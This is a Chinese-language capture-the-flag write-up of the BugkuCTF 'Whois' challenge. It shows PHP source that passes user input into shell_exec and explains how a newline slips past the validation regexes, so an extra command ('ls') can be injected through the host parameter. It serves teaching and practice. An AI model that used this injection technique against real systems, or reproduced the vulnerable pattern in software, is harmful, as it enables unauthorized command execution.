【BugkuCTF】Whois

直接访问http://49.232.142.230:15900/query.php

会直接爆出源码

复制代码
<?php

error_reporting(0);

$output = null;
$host_regex = "/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/";
$query_regex = "/^[0-9a-zA-Z\. ]+$/";


if (isset($_GET['query']) && isset($_GET['host']) && 
      is_string($_GET['query']) && is_string($_GET['host'])) {

  $query = $_GET['query'];
  $host = $_GET['host'];
  
  if ( !preg_match($host_regex, $host) || !preg_match($query_regex, $query) ) {
    $output = "Invalid query or whois host";
  } else {
    $output = shell_exec("/usr/bin/whois -h ${host} ${query}");
  }

} 
else {
  highlight_file(__FILE__);
  exit;
}

?>

<!DOCTYPE html>
<html>
  <head>
    <title>Whois</title>
  </head>
  <body>
    <pre><?= htmlspecialchars($output) ?></pre>
  </body>
</html>

具体执行的命令大概如下所示

复制代码
/usr/bin/whois -h whois.verisign-grs.com baidu.com

但是这里需要绕正则,通过正则可知我们无法使用常规的方法来拼接命令

复制代码
# host参数只能由0-9、a-z、A-Z、.(点)、-(减号)以及\n或者\r 组成
$host_regex = "/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/";
# query参数只能由0-9、a-z、A-Z、.(点)、 (空格)以及\n或者\r组成
$query_regex = "/^[0-9a-zA-Z\. ]+$/";

可以看到**\n换行符** 和**\r回车符**是可以用的

这里回车符不行,但是换行符可以

这样子后端的命令就变成了

复制代码
/usr/bin/whois -h whois.verisign-grs.com
ls
相关推荐
贝拉学无止尽4 小时前
跨境电商如何搭建网络实操方案
网络·网络安全·跨境网络
白帽子黑客杰哥5 小时前
金三银四网络安全求职全攻略:抓住327万人才缺口,精准斩获高薪Offer
web安全·网络安全·面试
lplum_5 小时前
2025第十届“楚慧杯”湖北省网络与数据安全实践能力竞赛 wp
网络·安全·web安全·网络安全·系统安全·密码学·新人首发
惊岁晚11 小时前
【WSL】访问443端口被拒
网络安全
vortex513 小时前
evil-winrm 与 evil-winrm-py 使用指南
网络安全·渗透测试·kali
xixixi7777714 小时前
数字世界的攻防战:网络安全的演进之路
网络·人工智能·安全·web安全·网络安全·攻击
介一安全14 小时前
【Web安全】HOST碰撞漏洞测试指南
web安全·网络安全·安全性测试
Z1eaf_complete14 小时前
利用文件包含GetShell
安全·网络安全
0xSec笔记本挖呀瓦呀挖14 小时前
OpenClawWeComzh 实战:安卓 APK 分析与手机取证全自动化基础玩法
android·web安全·网络安全·智能手机·自动化·取证·电子数据取证
见青..1 天前
[BUUCTF]Misc篇wp
网络安全·ctf·misc·buuctf